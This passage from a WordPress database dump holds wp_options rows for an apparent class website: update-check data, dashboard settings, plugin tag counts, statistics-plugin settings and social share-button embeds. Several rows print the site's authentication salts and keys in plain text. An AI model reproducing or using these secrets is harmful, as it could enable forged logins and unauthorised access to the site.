:\"cordobo-green-park-2\";s:7:\"0.9.502\";s:5:\"corp2\";s:2:\"v1\";s:6:\"fusion\";s:3:\"3.1\";s:13:\"grayCorporate\";s:2:\"v1\";s:5:\"inove\";s:5:\"1.4.6\";s:14:\"lightspersonal\";s:4:\"1.00\";s:9:\"lightword\";s:7:\"2.0.0.6\";s:10:\"monochrome\";s:5:\"3.0.4\";s:15:\"orangeCorporate\";s:2:\"v1\";s:5:\"pixel\";s:5:\"2.0.2\";s:5:\"trees\";s:2:\"v1\";s:12:\"twentyeleven\";s:3:\"1.5\";s:12:\"twentytwelve\";s:3:\"1.1\";}s:8:\"response\";a:3:{s:9:\"atahualpa\";a:4:{s:5:\"theme\";s:9:\"atahualpa\";s:11:\"new_version\";s:6:\"3.7.22\";s:3:\"url\";s:38:\"https://wordpress.org/themes/atahualpa\";s:7:\"package\";s:57:\"http://downloads.wordpress.org/theme/atahualpa.3.7.22.zip\";}s:12:\"twentyeleven\";a:4:{s:5:\"theme\";s:12:\"twentyeleven\";s:11:\"new_version\";s:3:\"2.0\";s:3:\"url\";s:41:\"https://wordpress.org/themes/twentyeleven\";s:7:\"package\";s:57:\"http://downloads.wordpress.org/theme/twentyeleven.2.0.zip\";}s:12:\"twentytwelve\";a:4:{s:5:\"theme\";s:12:\"twentytwelve\";s:11:\"new_version\";s:3:\"1.6\";s:3:\"url\";s:41:\"https://wordpress.org/themes/twentytwelve\";s:7:\"package\";s:57:\"http://downloads.wordpress.org/theme/twentytwelve.1.6.zip\";}}}','yes'),(113,'auth_salt','!QiRPK>2@2vhn:Q]S2x3KdDl~-:b-<hYDF$yEsDi .[Y~U-yYg;7,~%-Vg~NiAcf','yes'),(114,'logged_in_key','Q_MygyZ6sxF$>GbsGa[.G>{]f_~2HGD=(ADN7jv9nsIg,apPeme3d=1A%;!-X1at','yes'),(115,'logged_in_salt','k$sQFm]PqKM>2Fc7v()~T>%+@L}X)d&FfBPP6#W-7(7H;5N*,3_W!V>}g(uY3HRW','yes'),(116,'jetpack_options','a:2:{s:7:\"version\";s:14:\"2.2:1369507396\";s:11:\"old_version\";s:14:\"2.2:1369507396\";}','yes'),(623,'_site_transient_timeout_browser_f05cff578d2c9dfef038375d3eee47d4','1372870974','yes'),(624,'_site_transient_browser_f05cff578d2c9dfef038375d3eee47d4','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:17:\"Internet Explorer\";s:7:\"version\";s:4:\"10.0\";s:10:\"update_url\";s:51:\"http://www.microsoft.com/windows/internet-explorer/\";s:7:\"img_src\";s:45:\"http://s.wordpress.org/images/browsers/ie.png\";s:11:\"img_src_ssl\";s:44:\"https://wordpress.org/images/browsers/ie.png\";s:15:\"current_version\";s:1:\"9\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(119,'dashboard_widget_options','a:4:{s:25:\"dashboard_recent_comments\";a:1:{s:5:\"items\";i:5;}s:24:\"dashboard_incoming_links\";a:5:{s:4:\"home\";s:44:\"http://wpclass.thegammonpress.com/ed2goclass\";s:4:\"link\";s:120:\"http://blogsearch.google.com/blogsearch?scoring=d&partner=wordpress&q=link:http://wpclass.thegammonpress.com/ed2goclass/\";s:3:\"url\";s:153:\"http://blogsearch.google.com/blogsearch_feeds?scoring=d&ie=utf-8&num=10&output=rss&partner=wordpress&q=link:http://wpclass.thegammonpress.com/ed2goclass/\";s:5:\"items\";i:10;s:9:\"show_date\";b:0;}s:17:\"dashboard_primary\";a:7:{s:4:\"link\";s:26:\"http://wordpress.org/news/\";s:3:\"url\";s:31:\"http://wordpress.org/news/feed/\";s:5:\"title\";s:14:\"WordPress Blog\";s:5:\"items\";i:2;s:12:\"show_summary\";i:1;s:11:\"show_author\";i:0;s:9:\"show_date\";i:1;}s:19:\"dashboard_secondary\";a:7:{s:4:\"link\";s:28:\"http://planet.wordpress.org/\";s:3:\"url\";s:33:\"http://planet.wordpress.org/feed/\";s:5:\"title\";s:20:\"Other WordPress News\";s:5:\"items\";i:5;s:12:\"show_summary\";i:0;s:11:\"show_author\";i:0;s:9:\"show_date\";i:0;}}','yes'),(120,'nonce_key','bu{s5~4/#] mo~S*wBZ[jq] |:r}(l7E~uP^e~N+_akFmhquwcK+L{dF$>(zqv<U','yes'),(121,'nonce_salt','Hc!b`jq0Kf35l>[D!;y<#4.4G08DIYATxiFTbWD$=5E|&XWaH:A!%IVrmBoh@U.x','yes'),(763,'_transient_timeout_feed_mod_57bc725ad6568758915363af670fd8bc','1423563976','no'),(764,'_transient_feed_mod_57bc725ad6568758915363af670fd8bc','1423520776','no'),(767,'_transient_timeout_dash_de3249c4736ad3bd2cd29147c4a0d43e','1423563976','no'),(768,'_transient_dash_de3249c4736ad3bd2cd29147c4a0d43e','<h4>Most Popular</h4>\n<h5><a href=\'https://wordpress.org/plugins/updraftplus/\'>UpdraftPlus Backup and Restoration</a></h5> <span>(<a href=\'plugin-install.php?tab=plugin-information&plugin=updraftplus&_wpnonce=d91c05e3e6&TB_iframe=true&width=600&height=800\' class=\'thickbox\' title=\'UpdraftPlus Backup and Restoration\'>Install</a>)</span>\n<p>Backup and restoration made easy. Complete backups; manual or scheduled (backup to S3, Dropbox, Google Drive, Rackspace, FTP, SFTP, email + others).</p>\n<h4>Newest Plugins</h4>\n<h5><a href=\'https://wordpress.org/plugins/bws-testimonials/\'>Testimonials by BestWebSoft</a></h5> <span>(<a href=\'plugin-install.php?tab=plugin-information&plugin=bws-testimonials&_wpnonce=4dd688d138&TB_iframe=true&width=600&height=800\' class=\'thickbox\' title=\'Testimonials by BestWebSoft\'>Install</a>)</span>\n<p>Plugin for displaying Testimonials.</p>\n','no'),(505,'marina_url1','http://wpclass.thegammonpress.com/ed2goclass/kits/american-pond-kits','yes'),(506,'marina_banner2','http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/06/125x125-your_ad.png','yes'),(507,'marina_url2','Banner-2 url','yes'),(508,'marina_banner3','http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/06/125x125-plants.png','yes'),(509,'marina_url3','Banner-3 url','yes'),(510,'marina_banner4','http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/06/125x125-live_koi.png','yes'),(511,'marina_url4','Banner-4 url','yes'),(512,'marina_ad1','','yes'),(513,'marina_foot','','yes'),(759,'_transient_timeout_feed_mod_a5420c83891a9c88ad2a4f04584a5efc','1423563975','no'),(760,'_transient_feed_mod_a5420c83891a9c88ad2a4f04584a5efc','1423520775','no'),(354,'si_contact_form_gb','a:7:{s:7:\"donated\";s:5:\"false\";s:9:\"max_forms\";s:1:\"4\";s:10:\"max_fields\";s:1:\"4\";s:18:\"vcita_auto_install\";s:4:\"true\";s:13:\"vcita_dismiss\";s:5:\"false\";s:11:\"ctf_version\";s:7:\"3.1.8.2\";s:5:\"2.6.3\";i:1;}','yes'),(692,'_site_transient_timeout_poptags_40cd750bba9870f18aada2478b24840a','1372537429','yes'),(693,'_site_transient_poptags_40cd750bba9870f18aada2478b24840a','a:40:{s:6:\"widget\";a:3:{s:4:\"name\";s:6:\"widget\";s:4:\"slug\";s:6:\"widget\";s:5:\"count\";s:4:\"3827\";}s:4:\"post\";a:3:{s:4:\"name\";s:4:\"Post\";s:4:\"slug\";s:4:\"post\";s:5:\"count\";s:4:\"2420\";}s:6:\"plugin\";a:3:{s:4:\"name\";s:6:\"plugin\";s:4:\"slug\";s:6:\"plugin\";s:5:\"count\";s:4:\"2308\";}s:5:\"admin\";a:3:{s:4:\"name\";s:5:\"admin\";s:4:\"slug\";s:5:\"admin\";s:5:\"count\";s:4:\"1914\";}s:5:\"posts\";a:3:{s:4:\"name\";s:5:\"posts\";s:4:\"slug\";s:5:\"posts\";s:5:\"count\";s:4:\"1829\";}s:7:\"sidebar\";a:3:{s:4:\"name\";s:7:\"sidebar\";s:4:\"slug\";s:7:\"sidebar\";s:5:\"count\";s:4:\"1569\";}s:7:\"twitter\";a:3:{s:4:\"name\";s:7:\"twitter\";s:4:\"slug\";s:7:\"twitter\";s:5:\"count\";s:4:\"1305\";}s:6:\"google\";a:3:{s:4:\"name\";s:6:\"google\";s:4:\"slug\";s:6:\"google\";s:5:\"count\";s:4:\"1304\";}s:8:\"comments\";a:3:{s:4:\"name\";s:8:\"comments\";s:4:\"slug\";s:8:\"comments\";s:5:\"count\";s:4:\"1289\";}s:6:\"images\";a:3:{s:4:\"name\";s:6:\"images\";s:4:\"slug\";s:6:\"images\";s:5:\"count\";s:4:\"1244\";}s:4:\"page\";a:3:{s:4:\"name\";s:4:\"page\";s:4:\"slug\";s:4:\"page\";s:5:\"count\";s:4:\"1201\";}s:5:\"image\";a:3:{s:4:\"name\";s:5:\"image\";s:4:\"slug\";s:5:\"image\";s:5:\"count\";s:4:\"1114\";}s:5:\"links\";a:3:{s:4:\"name\";s:5:\"links\";s:4:\"slug\";s:5:\"links\";s:5:\"count\";s:3:\"972\";}s:9:\"shortcode\";a:3:{s:4:\"name\";s:9:\"shortcode\";s:4:\"slug\";s:9:\"shortcode\";s:5:\"count\";s:3:\"960\";}s:8:\"facebook\";a:3:{s:4:\"name\";s:8:\"Facebook\";s:4:\"slug\";s:8:\"facebook\";s:5:\"count\";s:3:\"956\";}s:3:\"seo\";a:3:{s:4:\"name\";s:3:\"seo\";s:4:\"slug\";s:3:\"seo\";s:5:\"count\";s:3:\"929\";}s:9:\"wordpress\";a:3:{s:4:\"name\";s:9:\"wordpress\";s:4:\"slug\";s:9:\"wordpress\";s:5:\"count\";s:3:\"822\";}s:7:\"gallery\";a:3:{s:4:\"name\";s:7:\"gallery\";s:4:\"slug\";s:7:\"gallery\";s:5:\"count\";s:3:\"809\";}s:6:\"social\";a:3:{s:4:\"name\";s:6:\"social\";s:4:\"slug\";s:6:\"social\";s:5:\"count\";s:3:\"763\";}s:3:\"rss\";a:3:{s:4:\"name\";s:3:\"rss\";s:4:\"slug\";s:3:\"rss\";s:5:\"count\";s:3:\"710\";}s:7:\"widgets\";a:3:{s:4:\"name\";s:7:\"widgets\";s:4:\"slug\";s:7:\"widgets\";s:5:\"count\";s:3:\"677\";}s:6:\"jquery\";a:3:{s:4:\"name\";s:6:\"jquery\";s:4:\"slug\";s:6:\"jquery\";s:5:\"count\";s:3:\"670\";}s:5:\"pages\";a:3:{s:4:\"name\";s:5:\"pages\";s:4:\"slug\";s:5:\"pages\";s:5:\"count\";s:3:\"666\";}s:5:\"email\";a:3:{s:4:\"name\";s:5:\"email\";s:4:\"slug\";s:5:\"email\";s:5:\"count\";s:3:\"615\";}s:4:\"ajax\";a:3:{s:4:\"name\";s:4:\"AJAX\";s:4:\"slug\";s:4:\"ajax\";s:5:\"count\";s:3:\"611\";}s:5:\"media\";a:3:{s:4:\"name\";s:5:\"media\";s:4:\"slug\";s:5:\"media\";s:5:\"count\";s:3:\"580\";}s:10:\"javascript\";a:3:{s:4:\"name\";s:10:\"javascript\";s:4:\"slug\";s:10:\"javascript\";s:5:\"count\";s:3:\"560\";}s:5:\"video\";a:3:{s:4:\"name\";s:5:\"video\";s:4:\"slug\";s:5:\"video\";s:5:\"count\";s:3:\"552\";}s:10:\"buddypress\";a:3:{s:4:\"name\";s:10:\"buddypress\";s:4:\"slug\";s:10:\"buddypress\";s:5:\"count\";s:3:\"544\";}s:4:\"feed\";a:3:{s:4:\"name\";s:4:\"feed\";s:4:\"slug\";s:4:\"feed\";s:5:\"count\";s:3:\"534\";}s:7:\"content\";a:3:{s:4:\"name\";s:7:\"content\";s:4:\"slug\";s:7:\"content\";s:5:\"count\";s:3:\"519\";}s:5:\"photo\";a:3:{s:4:\"name\";s:5:\"photo\";s:4:\"slug\";s:5:\"photo\";s:5:\"count\";s:3:\"518\";}s:4:\"link\";a:3:{s:4:\"name\";s:4:\"link\";s:4:\"slug\";s:4:\"link\";s:5:\"count\";s:3:\"497\";}s:6:\"photos\";a:3:{s:4:\"name\";s:6:\"photos\";s:4:\"slug\";s:6:\"photos\";s:5:\"count\";s:3:\"492\";}s:5:\"login\";a:3:{s:4:\"name\";s:5:\"login\";s:4:\"slug\";s:5:\"login\";s:5:\"count\";s:3:\"452\";}s:4:\"spam\";a:3:{s:4:\"name\";s:4:\"spam\";s:4:\"slug\";s:4:\"spam\";s:5:\"count\";s:3:\"451\";}s:8:\"category\";a:3:{s:4:\"name\";s:8:\"category\";s:4:\"slug\";s:8:\"category\";s:5:\"count\";s:3:\"448\";}s:5:\"stats\";a:3:{s:4:\"name\";s:5:\"stats\";s:4:\"slug\";s:5:\"stats\";s:5:\"count\";s:3:\"448\";}s:7:\"youtube\";a:3:{s:4:\"name\";s:7:\"youtube\";s:4:\"slug\";s:7:\"youtube\";s:5:\"count\";s:3:\"431\";}s:5:\"share\";a:3:{s:4:\"name\";s:5:\"Share\";s:4:\"slug\";s:5:\"share\";s:5:\"count\";s:3:\"426\";}}','yes'),(651,'wassup_settings','a:54:{s:14:\"wassup_refresh\";s:1:\"3\";s:16:\"wassup_userlevel\";s:1:\"8\";s:17:\"wassup_screen_res\";s:4:\"1024\";s:19:\"wassup_default_type\";s:12:\"nospamspider\";s:23:\"wassup_default_spy_type\";s:10:\"everything\";s:20:\"wassup_default_limit\";s:2:\"50\";s:12:\"wassup_top10\";s:496:\"a:11:{s:8:"toplimit";i:10;s:9:"topsearch";s:1:"1";s:11:"topreferrer";s:1:"1";s:10:"toprequest";s:1:"1";s:10:"topbrowser";s:1:"1";s:5:"topos";s:1:"1";s:9:"toplocale";s:1:"0";s:10:"topvisitor";s:1:"0";s:9:"toppostid";s:1:"0";s:19:"topreferrer_exclude";s:0:"";s:12:"top_nospider";s:1:"1";}\";s:22:\"wassup_dashboard_chart\";s:1:\"1\";s:16:\"wassup_geoip_map\";s:0:\"\";s:21:\"wassup_googlemaps_key\";s:0:\"\";s:16:\"wassup_spy_speed\";s:4:\"5000\";s:18:\"wassup_time_format\";s:2:\"12\";s:18:\"wassup_time_period\";s:1:\"1\";s:13:\"wassup_active\";s:1:\"1\";s:15:\"wassup_loggedin\";s:1:\"1\";s:12:\"wassup_admin\";s:1:\"1\";s:13:\"wassup_spider\";s:1:\"1\";s:13:\"wassup_attack\";s:1:\"1\";s:11:\"wassup_hack\";s:1:\"1\";s:14:\"wassup_exclude\";s:0:\"\";s:18:\"wassup_exclude_url\";s:0:\"\";s:19:\"wassup_exclude_user\";s:0:\"\";s:16:\"wassup_spamcheck\";s:1:\"1\";s:11:\"wassup_spam\";s:1:\"1\";s:14:\"wassup_refspam\";s:1:\"1\";s:11:\"delete_auto\";s:5:\"never\";s:13:\"delete_filter\";s:3:\"all\";s:16:\"wassup_remind_mb\";s:1:\"0\";s:18:\"wassup_remind_flag\";s:1:\"0\";s:16:\"wassup_uninstall\";s:1:\"0\";s:15:\"wassup_optimize\";s:10:\"1372511728\";s:14:\"wassup_version\";s:0:\"\";s:12:\"wassup_table\";s:9:\"wp_wassup\";s:15:\"wassup_dbengine\";s:6:\"MyISAM\";s:12:\"wassup_cache\";s:1:\"0\";s:12:\"wassup_chart\";s:1:\"1\";s:17:\"wassup_chart_type\";s:1:\"2\";s:19:\"wassup_widget_title\";s:15:\"Visitors Online\";s:21:\"wassup_widget_ulclass\";s:5:\"links\";s:22:\"wassup_widget_loggedin\";s:1:\"1\";s:21:\"wassup_widget_comauth\";s:1:\"1\";s:20:\"wassup_widget_search\";s:1:\"1\";s:25:\"wassup_widget_searchlimit\";s:1:\"5\";s:17:\"wassup_widget_ref\";s:1:\"1\";s:22:\"wassup_widget_reflimit\";s:1:\"5\";s:19:\"wassup_widget_topbr\";s:1:\"1\";s:24:\"wassup_widget_topbrlimit\";s:1:\"5\";s:19:\"wassup_widget_topos\";s:1:\"1\";s:24:\"wassup_widget_toposlimit\";s:1:\"5\";s:19:\"wassup_widget_chars\";s:2:\"18\";s:20:\"wassup_alert_message\";s:0:\"\";s:5:\"wmark\";s:0:\"\";s:3:\"wip\";s:0:\"\";s:5:\"whash\";s:32:\"fc516a78820d38570fbb1b46b83fb97f\";}','yes'),(694,'_site_transient_update_plugins','O:8:\"stdClass\":2:{s:12:\"last_checked\";i:1423691548;s:8:\"response\";a:7:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:5:\"3.0.4\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:55:\"http://downloads.wordpress.org/plugin/akismet.3.0.4.zip\";}s:35:\"display-widgets/display-widgets.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:5:\"10109\";s:4:\"slug\";s:15:\"display-widgets\";s:6:\"plugin\";s:35:\"display-widgets/display-widgets.php\";s:11:\"new_version\";s:4:\"2.03\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/display-widgets/\";s:7:\"package\";s:62:\"http://downloads.wordpress.org/plugin/display-widgets.2.03.zip\";}s:15:\"eshop/eshop.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:4:\"2919\";s:4:\"slug\";s:5:\"eshop\";s:6:\"plugin\";s:15:\"eshop/eshop.php\";s:11:\"new_version\";s:6:\"6.3.11\";s:3:\"url\";s:36:\"https://wordpress.org/plugins/eshop/\";s:7:\"package\";s:54:\"http://downloads.wordpress.org/plugin/eshop.6.3.11.zip\";}s:35:\"si-contact-form/si-contact-form.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:4:\"9891\";s:4:\"slug\";s:15:\"si-contact-form\";s:6:\"plugin\";s:35:\"si-contact-form/si-contact-form.php\";s:11:\"new_version\";s:6:\"4.0.32\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/si-contact-form/\";s:7:\"package\";s:57:\"http://downloads.wordpress.org/plugin/si-contact-form.zip\";}s:36:\"google-sitemap-generator/sitemap.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:3:\"132\";s:4:\"slug\";s:24:\"google-sitemap-generator\";s:6:\"plugin\";s:36:\"google-sitemap-generator/sitemap.php\";s:11:\"new_version\";s:5:\"4.0.8\";s:3:\"url\";s:55:\"https://wordpress.org/plugins/google-sitemap-generator/\";s:7:\"package\";s:72:\"http://downloads.wordpress.org/plugin/google-sitemap-generator.4.0.8.zip\";}s:17:\"wassup/wassup.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:4:\"1124\";s:4:\"slug\";s:6:\"wassup\";s:6:\"plugin\";s:17:\"wassup/wassup.php\";s:11:\"new_version\";s:5:\"1.8.6\";s:3:\"url\";s:37:\"https://wordpress.org/plugins/wassup/\";s:7:\"package\";s:54:\"http://downloads.wordpress.org/plugin/wassup.1.8.6.zip\";}s:27:\"wp-super-cache/wp-cache.php\";O:8:\"stdClass\":7:{s:2:\"id\";s:4:\"1221\";s:4:\"slug\";s:14:\"wp-super-cache\";s:6:\"plugin\";s:27:\"wp-super-cache/wp-cache.php\";s:11:\"new_version\";s:5:\"1.4.2\";s:14:\"upgrade_notice\";s:91:\"Fixed "acceptable file list" and no caching for GET queries bugs in last release.\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/wp-super-cache/\";s:7:\"package\";s:62:\"http://downloads.wordpress.org/plugin/wp-super-cache.1.4.2.zip\";}}}','yes'),(615,'sociable_known_sites','a:27:{s:8:\"Facebook\";a:3:{s:7:\"favicon\";s:12:\"facebook.png\";s:3:\"url\";s:57:\"http://www.facebook.com/share.php?u=PERMALINK&t=TITLE\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:5:\"-48px\";i:1;s:3:\"0px\";}i:32;a:2:{i:0;s:5:\"-96px\";i:1;s:3:\"0px\";}i:48;a:2:{i:0;s:6:\"-144px\";i:1;s:3:\"0px\";}i:64;a:2:{i:0;s:6:\"-192px\";i:1;s:3:\"0px\";}}}s:16:\"Facebook Counter\";a:4:{s:7:\"counter\";i:1;s:7:\"favicon\";s:15:\"likecounter.png\";s:3:\"url\";s:284:\"<iframe src=\"http://www.facebook.com/plugins/like.php?href=PERMALINKCOUNT&send=false&layout=button_count&show_faces=false&action=like&colorscheme=light&font\" scrolling=\"no\" frameborder=\"0\" style=\"border:none; overflow:hidden;height:32px;width:100px\" allowTransparency=\"true\"></iframe>\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:5:\"-48px\";i:1;s:3:\"0px\";}i:32;a:2:{i:0;s:5:\"-96px\";i:1;s:3:\"0px\";}i:48;a:2:{i:0;s:6:\"-144px\";i:1;s:3:\"0px\";}i:64;a:2:{i:0;s:6:\"-192px\";i:1;s:3:\"0px\";}}}s:7:\"Myspace\";a:3:{s:7:\"favicon\";s:11:\"myspace.png\";s:3:\"url\";s:68:\"http://www.myspace.com/Modules/PostTo/Pages/?u=PERMALINK&t=TITLE\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:3:\"0px\";i:1;s:5:\"-16px\";}i:32;a:2:{i:0;s:3:\"0px\";i:1;s:5:\"-32px\";}i:48;a:2:{i:0;s:3:\"0px\";i:1;s:5:\"-48px\";}i:64;a:2:{i:0;s:3:\"0px\";i:1;s:5:\"-64px\";}}}s:7:\"Twitter\";a:3:{s:7:\"favicon\";s:11:\"twitter.png\";s:3:\"url\";s:71:\"http://twitter.com/intent/tweet?text=TITLE%20-%20PERMALINK%20 SHARETAG\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:6:\"-144px\";i:1;s:5:\"-16px\";}i:32;a:2:{i:0;s:6:\"-288px\";i:1;s:5:\"-32px\";}i:48;a:2:{i:0;s:6:\"-432px\";i:1;s:5:\"-48px\";}i:64;a:2:{i:0;s:6:\"-576px\";i:1;s:5:\"-64px\";}}}s:15:\"Twitter Counter\";a:4:{s:7:\"counter\";i:1;s:7:\"favicon\";s:11:\"twitter.png\";s:3:\"url\";s:244:\"<a href=\"https://twitter.com/share\" data-text=\"TITLECOUNT - PERMALINKCOUNT\" data-url=\"PERMALINKCOUNT\" class=\"twitter-share-button\" data-count=\"horizontal\">Tweet</a><script type=\"text/javascript\" src=\"//platform.twitter.com/widgets.js\"></script>\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:6:\"-144px\";i:1;s:5:\"-16px\";}i:32;a:2:{i:0;s:6:\"-288px\";i:1;s:5:\"-32px\";}i:48;a:2:{i:0;s:6:\"-432px\";i:1;s:5:\"-48px\";}i:64;a:2:{i:0;s:6:\"-576px\";i:1;s:5:\"-64px\";}}}s:8:\"LinkedIn\";a:3:{s:7:\"favicon\";s:12:\"linkedin.png\";s:3:\"url\";s:120:\"http://www.linkedin.com/shareArticle?mini=true&url=PERMALINK&title=TITLE&source=BLOGNAME&summary=EXCERPT\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:6:\"-144px\";i:1;s:3:\"0px\";}i:32;a:2:{i:0;s:6:\"-288px\";i:1;s:3:\"0px\";}i:48;a:2:{i:0;s:6:\"-432px\";i:1;s:3:\"0px\";}i:64;a:2:{i:0;s:6:\"-576px\";i:1;s:3:\"0px\";}}}s:16:\"LinkedIn Counter\";a:4:{s:7:\"counter\";i:1;s:7:\"favicon\";s:12:\"linkedin.png\";s:3:\"url\";s:161:\"<script src=\"http://platform.linkedin.com/in.js\" type=\"text/javascript\"></script><script type=\"IN/Share\" data-url=\"PERMALINKCOUNT\" data-counter=\"right\"></script>\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:6:\"-144px\";i:1;s:3:\"0px\";}i:32;a:2:{i:0;s:6:\"-288px\";i:1;s:3:\"0px\";}i:48;a:2:{i:0;s:6:\"-432px\";i:1;s:3:\"0px\";}i:64;a:2:{i:0;s:6:\"-576px\";i:1;s:3:\"0px\";}}}s:9:\"Delicious\";a:3:{s:7:\"favicon\";s:13:\"delicious.png\";s:3:\"url\";s:73:\"http://delicious.com/post?url=PERMALINK&title=TITLE&notes=EXCERPT\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:5:\"-16px\";i:1;s:3:\"0px\";}i:32;a:2:{i:0;s:5:\"-32px\";i:1;s:3:\"0px\";}i:48;a:2:{i:0;s:5:\"-48px\";i:1;s:3:\"0px\";}i:64;a:2:{i:0;s:5:\"-64px\";i:1;s:3:\"0px\";}}}s:4:\"Digg\";a:3:{s:7:\"favicon\";s:8:\"digg.png\";s:3:\"url\";s:85:\"http://digg.com/submit?phase=2&url=PERMALINK&title=TITLE&bodytext=EXCERPT\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:5:\"-32px\";i:1;s:3:\"0px\";}i:32;a:2:{i:0;s:5:\"-64px\";i:1;s:3:\"0px\";}i:48;a:2:{i:0;s:5:\"-96px\";i:1;s:3:\"0px\";}i:64;a:2:{i:0;s:6:\"-128px\";i:1;s:3:\"0px\";}}}s:12:\"Digg Counter\";a:4:{s:7:\"counter\";i:1;s:7:\"favicon\";s:8:\"digg.png\";s:3:\"url\";s:372:\"<script type=\'text/javascript\'>(function() {var s = document.createElement(\'SCRIPT\'), s1 = document.getElementsByTagName(\'SCRIPT\')[0];s.type = \'text/javascript\';s.async = true;s.src = \'http://widgets.digg.com/buttons.js\';s1.parentNode.insertBefore(s, s1);})();</script><a href=\'http://digg.com/submit?url=PERMALINK&title=TITLE\' class=\'DiggThisButton DiggCompact\'></a>\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:5:\"-32px\";i:1;s:3:\"0px\";}i:32;a:2:{i:0;s:5:\"-64px\";i:1;s:3:\"0px\";}i:48;a:2:{i:0;s:5:\"-96px\";i:1;s:3:\"0px\";}i:64;a:2:{i:0;s:6:\"-128px\";i:1;s:3:\"0px\";}}}s:6:\"Reddit\";a:3:{s:7:\"favicon\";s:10:\"reddit.png\";s:3:\"url\";s:54:\"http://reddit.com/submit?url=PERMALINK&title=TITLE\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:5:\"-64px\";i:1;s:5:\"-16px\";}i:32;a:2:{i:0;s:6:\"-128px\";i:1;s:5:\"-32px\";}i:48;a:2:{i:0;s:6:\"-192px\";i:1;s:5:\"-48px\";}i:64;a:2:{i:0;s:6:\"-256px\";i:1;s:5:\"-64px\";}}}s:11:\"StumbleUpon\";a:3:{s:7:\"favicon\";s:15:\"stumbleupon.png\";s:3:\"url\";s:59:\"http://www.stumbleupon.com/submit?url=PERMALINK&title=TITLE\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:6:\"-112px\";i:1;s:5:\"-16px\";}i:32;a:2:{i:0;s:6:\"-224px\";i:1;s:5:\"-32px\";}i:48;a:2:{i:0;s:6:\"-336px\";i:1;s:5:\"-48px\";}i:64;a:2:{i:0;s:6:\"-448px\";i:1;s:5:\"-64px\";}}}s:19:\"StumbleUpon Counter\";a:4:{s:7:\"counter\";i:1;s:7:\"favicon\";s:15:\"stumbleupon.png\";s:3:\"url\";s:87:\"<script src=\"http://www.stumbleupon.com/hostedbadge.php?s=2&r=PERMALINKCOUNT\"></script>\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:6:\"-112px\";i:1;s:5:\"-16px\";}i:32;a:2:{i:0;s:6:\"-224px\";i:1;s:5:\"-32px\";}i:48;a:2:{i:0;s:6:\"-336px\";i:1;s:5:\"-48px\";}i:64;a:2:{i:0;s:6:\"-448px\";i:1;s:5:\"-64px\";}}}s:6:\"vuible\";a:3:{s:7:\"favicon\";s:10:\"vuible.png\";s:3:\"url\";s:88:\"http://vuible.com/pins-settings/?m=bm&imgsrc=SOURCE&source=PERMALINK&title=TITLE&video=0\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:6:\"-112px\";i:1;s:5:\"-16px\";}i:32;a:2:{i:0;s:6:\"-224px\";i:1;s:5:\"-32px\";}i:48;a:2:{i:0;s:6:\"-336px\";i:1;s:5:\"-48px\";}i:64;a:2:{i:0;s:6:\"-448px\";i:1;s:5:\"-64px\";}}}s:14:\"vuible Counter\";a:4:{s:7:\"counter\";i:1;s:7:\"favicon\";s:10:\"vuible.png\";s:3:\"url\";s:87:\"<script src=\"http://www.stumbleupon.com/hostedbadge.php?s=2&r=PERMALINKCOUNT\"></script>\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:6:\"-112px\";i:1;s:5:\"-16px\";}i:32;a:2:{i:0;s:6:\"-224px\";i:1;s:5:\"-32px\";}i:48;a:2:{i:0;s:6:\"-336px\";i:1;s:5:\"-48px\";}i:64;a:2:{i:0;s:6:\"-448px\";i:1;s:5:\"-64px\";}}}s:16:\"Google Bookmarks\";a:4:{s:7:\"favicon\";s:10:\"google.png\";s:3:\"url\";s:102:\"http://www.google.com/bookmarks/mark?op=edit&bkmk=PERMALINK&title=TITLE&annotation=EXCERPT\";s:11:\"description\";s:16:\"Google Bookmarks\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:5:\"-96px\";i:1;s:3:\"0px\";}i:32;a:2:{i:0;s:6:\"-192px\";i:1;s:3:\"0px\";}i:48;a:2:{i:0;s:6:\"-288px\";i:1;s:3:\"0px\";}i:64;a:2:{i:0;s:6:\"-384px\";i:1;s:3:\"0px\";}}}s:8:\"Google +\";a:5:{s:7:\"counter\";i:1;s:7:\"favicon\";s:10:\"google.png\";s:3:\"url\";s:79:\"<g:plusone annotation=\"bubble\" href=\"PERMALINKCOUNT\" size=\"medium\"></g:plusone>\";s:11:\"description\";s:16:\"Google 